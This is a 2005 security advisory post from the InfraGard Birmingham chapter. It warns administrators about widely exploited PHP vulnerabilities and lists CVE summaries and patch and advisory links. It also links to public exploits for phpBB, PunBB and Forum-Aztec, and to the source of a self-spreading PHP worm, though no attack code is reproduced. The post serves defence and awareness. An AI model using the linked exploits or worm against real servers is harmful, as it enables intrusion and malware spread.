InfraGard - Birmingham Chapter


Home \| Mailing Lists \| Meetings \| Resources \| About \|
	PHP Vulnerabilities: URGENT ATTENTION NEEDED PHP Vulnerabilities Urgent Attention Needed - Gary Warner I'm sending this note to remind people that each day HUNDREDS (if not thousands) of servers on the Internet are being rooted because of PHP Vulnerabilities. In the April meeting of the InfraGard Birmingham Members Alliance, I did a presentation on this topic, drawing URGENT ATTENTION to this manner. Because these rooted servers are being used as distribution points for Phishing, spam, and all manner of malware, it is in all of our interests to shut these things down. In addition to the many product vulnerabilities caused by poor coding practice, there are also many vulnerabilities in the PHP underlying platform which must be taken seriously. Symantec rates the general category of PHP Multiple Local and Remote Vulnerabilities as: Urgency = 9.3 Severity = 9.5 Impact = 9 Ease of Exploit = 10 The Most Detailed review of these problems is probably at Security Focus: PHP Multiple Local and Remote Vulnerabilities CVE's that deal with hot PHP issues include: Specifically . . . the "unpack()" function call has a memory disclosure issue the "safe_mode_exec_dir" has an access control bypass vulnerability the "safe_mode" has an access control bypass vulnerability the "realpath()" function call has a truncation vulnerability CAN-2004-0958 php_variables.c in PHP before 5.0.2 allows remote attackers to read sensitive memory contents via (1) GET, (2) POST, or (3) COOKIE GPC variables that end in an open bracket character, which causes PHP to calculate an incorrect string length. CAN-2004-0959 rfc1867.c in PHP before 5.0.2 allows local users to upload files to arbitrary locations via a PHP script with a certain MIME header that causes the "$_FILES" array to be modified. CAN-2004-1019 The deserialization code in PHP before 4.3.10 and PHP 5.x up to 5.0.2 allows remote attackers to cause a denial of service and execute arbitrary code via untrusted data to the unserialize function that may trigger "information disclosure, double free and negative reference index array underflow" results. CAN-2004-1018 Multiple integer handling errors in PHP before 4.3.10 allow attackers to bypass safe mode restrictions, cause a denial of service, or execute arbitrary code via (1) a negative offset value to the shmop_write function, (2) an "integer overflow/underflow" in the pack function, or (3) an "integer overflow/underflow" in the unpack function. CAN-2004-1063 PHP 4.x to 4.3.9, and PHP 5.x to 5.0.2, when running in safe mode on a multithreaded Unix webserver, allows local users to bypass safe_mode_exec_dir restrictions and execute commands outside of the intended safe_mode_exec_dir via shell metacharacters in the current directory name. CAN-2004-1064 The safe mode checks in PHP 4.x to 4.3.9 and PHP 5.x to 5.0.2 truncate the file path before passing the data to the realpath function, which could allow attackers to bypass safe mode Some other useful articles and pointers here . . . Red Hat php fixes: http://rhn.redhat.com/errata/RHSA-2004-687.html ISS X-Force on PHP problems: Unserialize - http://xforce.iss.net/xforce/xfdb/18514 Out-of-bouncs memory - http://xforce.iss.net/xforce/xfdb/18515 RealPath bypass - http://xforce.iss.net/xforce/xfdb/18512 Safe_Mode_Dir - http://xforce.iss.net/xforce/xfdb/18511 Memory Disclosure - http://xforce.iss.net/xforce/xfdb/17393 MIME Array Execute - http://xforce.iss.net/xforce/xfdb/17392 ALL OF THE ISSUES ABOVE THIS LINE ARE INHERENT WEAKNESSES IN THE DESIGN OF PHP. See the Security Focus advisory for links to many vendor sites that provide patches, but PLEASE USE CAUTION BEFORE IMPLEMENTING ANY PHP SOLUTION!!! I've also had many requests since the presentation to provide links to some of the vulnerable product information: The main site for checking to see if your PHP application has vulnerabilities is PHPSecure.info. They have an alphabetical list of 394 php based applications known to have at least one security vulnerability: So, you can just check the list to see that, for example, "phpMyAdmin" has had 56 published vulnerabilities, or that phpNuke 7.x has had 171 published vulnerabilities. Convenient links from that list will take you to the Secunia alert page for that product, which will tell you whether vendor patches will get you past the link or whether you will have a notice like these: http://secunia.com/product/4879/ -- PayProCart 3.x with all vendor patches installed and all vendor workarounds applied, is currently affected by one or more Secunia advisories rated Moderately critical http://secunia.com/product/4457/ -- Zeroboard 4.x with all vendor patches installed and all vendor workarounds applied, is currently affected by one or more Secunia advisories rated Highly critical There are several widespread exploits. Examples of these would include: phpBB exploit: http://www.frsirt.com/exploits/20050314.phpbbexp.cpp.php PunBB exploit: http://www.frsirt.com/exploits/20050329.r57punbb.pl.php Forum-Aztec exploit: http://www.frsirt.com/exploits/20050307.aztek.c.php And here is the source of a PHP Worm that attacks common PHP coding mistakes and spreads itself by doing Google lookups. Varieties of this worm are exploiting PHP boxes used for Phishing. Among the many sites vulnerable to this style of worm are phpBB sites. (The current version of phpBB is 2.0.14, released April 15, 2005 -- the last "critical security update" was 2.0.13, released Feb 27, 2005). http://www.frsirt.com/exploits/20041225.PhpIncludeWorm.php I hope that this information is helpful to you. Please feel free to pass this on to any other concerned parties. _-_ gary warner gar@askgar.com a proud member of InfraGard Birmingham Members Alliance http://www.birmingham-infragard.org/
© 2005-2007 Birmingham InfraGard, Daniel Clemens and Gary Warner. Original Site design by airmobile.com.